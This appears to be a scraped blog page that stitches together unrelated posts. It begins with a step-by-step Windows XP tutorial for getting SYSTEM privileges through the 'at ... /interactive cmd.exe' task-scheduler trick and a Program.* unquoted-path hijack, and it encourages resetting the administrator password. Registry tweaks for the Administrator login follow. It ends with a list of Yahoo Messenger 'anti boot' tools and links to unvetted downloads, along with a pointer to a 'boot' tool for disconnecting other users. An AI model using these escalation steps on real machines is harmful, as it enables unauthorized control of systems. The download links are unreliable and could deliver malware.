machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way: You can trick the system into running a program, script, or batch file with system level privileges. One sample One trick is to use a vulnerability in Windows long filename support. Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*. Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges. Quote: In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT. Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within. Getting SYSTEM I will now walk you through the process of obtaining SYSTEM privileges. To start, lets open up a command prompt (Start > Run > cmd > [ENTER]). At the prompt, enter the following command, then press [ENTER]: Code: at If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]: Code: at 15:25 /interactive “cmd.exe” Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this: When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this: You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there. At the system command prompt, enter in the following: Code: explorer.exe A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom): System user name on start menu explorer.exe running under SYSTEM What to do now Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination. ADMINISTRATOR IN WELCOME SCREEN. When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode. First you must ensure that the Administrator Account is enabled: 1 open Control Panel 2 open Administrative Tools 3 open Local Security Policy 4 expand Local Policies 5 click on Security Options 6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie. 1 open Control Panel 2 open User Accounts 3 click Change the way users log on or log off 4 untick Use the Welcome Screen 5 click Apply Options You will now be able to log on to Windows XP as Administrator in Normal Mode. EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor Go to: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \ Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Anti Boot Software for Yahoo Messenger (Update)

Official Yahoo Messenger is weak to prevent bots or spammer. To avoid bots you can use Anti Boots software to help you increase the security of your yahoo messenger. The booter or lamer usually targeted your id when you are login to the chat room of yahoo messenger. PM B0mb is the most annoying bots sent by a booter or lamer. In this article I want to share some of anti boot software that will protect you from booter or lamer. I not guarantee, you will undisconnected but, I guarantee when you use this anti Boot software you will not see a kind of PM or another boot like, Invite bots, Game bots, etc, Anti boot software work to paralyze or shut down your Private Message and other activities such add buddies, webcam, and voice talk. This makes your user name protected from booter who want you disconnect via PM b0mb and other. You can activate or deactivate anti boot as anytime you want. When you seem or feel you got in danger, you can activate this anti boot software and you become free of bots. Anti boot software in this article is affiliated to the yahoo messenger. Its mean that this anti boot software is design for official yahoo messenger chat client. You cannot use this anti boot software to other chat client except official yahoo messenger. I suggest you to used this anti boot software only when you are got in danger, especially when you go to the dangerous chat room or when you face or met you enemy in chat room KaoticProtocol Anit BootThis is an Anti boot with one click menu to activate or deactivate. KaoticProtocol Anti Boot is one of anti boot that used to yahoo messenger chat client. When you used this free ware software you just get an anti boot in two modes: Anti Invites and Anti PM . If you want get more options or modes you can buy a Pro Version through this site www.proport-programs.tk Click here to Download Spark Anti BootIf you want a more protected bots you can use this Spark Anti Boot software (Anti booter free download). Spark Anti Boot has many anti bots options: anti cam, anti invite, anti boots, anti voice, anti file sender, anti pm or buzzer, anti view share. It’s a good anti boot software for you. Its also have a full mode on or off.] Click here to Download Y! Filter Anti BootThis is another anti boot to prevent boots or bots with full options. Just like Spark Anti Boot Y! Filter also have a number of anti boot options. Y! Filter working to protect web cam , voice , shared files , pmb, lagg, invite/ conference , file , and error. Y! Filter used a notification area to activate or deactivate anti boot. You can choice by check the option of bots protected or just click start all or stop all. It’s a free software. Click here to Download You can download or Anti booter free download)and use KaoticProtocol, Spark, and Y! Filter by download from here. Update: Add Protect Me and Anti Booter Protect MeIn many yahoo anti boot web, Protect Me anti boot software is the most downloaded Anti Boot. Claimed to be 100% unbootable if you are using Protect Me, may be the reason why Protect Me became most wanted Anti Boot affiliating with Official Yahoo Messenger or even work with YahElite How to Use Protect Me? When you run Protect Me Anti Boot software, you will see login windows with username and password. Enter your username and password then push or click activation button. After that, open you chat client (YahElite, Yam, Ymlite or others) and select chat2 protocol and then press the “Load Account Information” button. Once your Account is loaded enter the chat room. Click here to download Anti Booter V3Anti Booter Version 3 is a name of Anti boot software just like spark anti boot. You can activate disable PM, PM Shield, Close PM, Disable Chat, Chat Shield, Close Chat, Anti Invite, Anti Voice and Anti Pm . For more information just download this anti boot software through link below Click here to download Update January 29, 2008 Protection Protection is anti boot software like Y Filter that will allow you to set anti boot protection through system try icon. Anti Boot options available in Protection are Anti Voice, Anti Conference Invite, Anti File, Anti PM, Grey Shield, Anti Decline, Anti Error, Anti Cam Invite, Ant Shared Files, and Anti All. To download this Protection Anti Boot just follow rapidshare link below: Click here to download Need Yahoo Boot? Visit Free Yahoo Boot Download Chat Client Anti Boot Software Beside of all anti boot software I share you above, there were few better way to make you unbootable or make an antiboot. The easiest way is installing and running in yahoo messenger with chat client that design to handle boot problem or we can calls as anti boot chat client. One of the best anti boot chat client in my experience is Yahaven. With Yahaven Ghost and Shield, you are almost unbootable. Yazak chat client also good enough to use as anti boot chat client. Using Yazak Ghost ID, you are almost unbootable. Remember Yazak Ghost ID differ wiht Yahaven Ghost ID. Happy Chat! And say farewell to Booter or Lamer! Related Articles:

  1. Anti Boot With Multi ID
  2. Anti Boot in Official Yahoo Messenger
  3. What is bots of Yahoo Messenger
  4. Yahoo Boot Software Review
 
 
Blogger Templates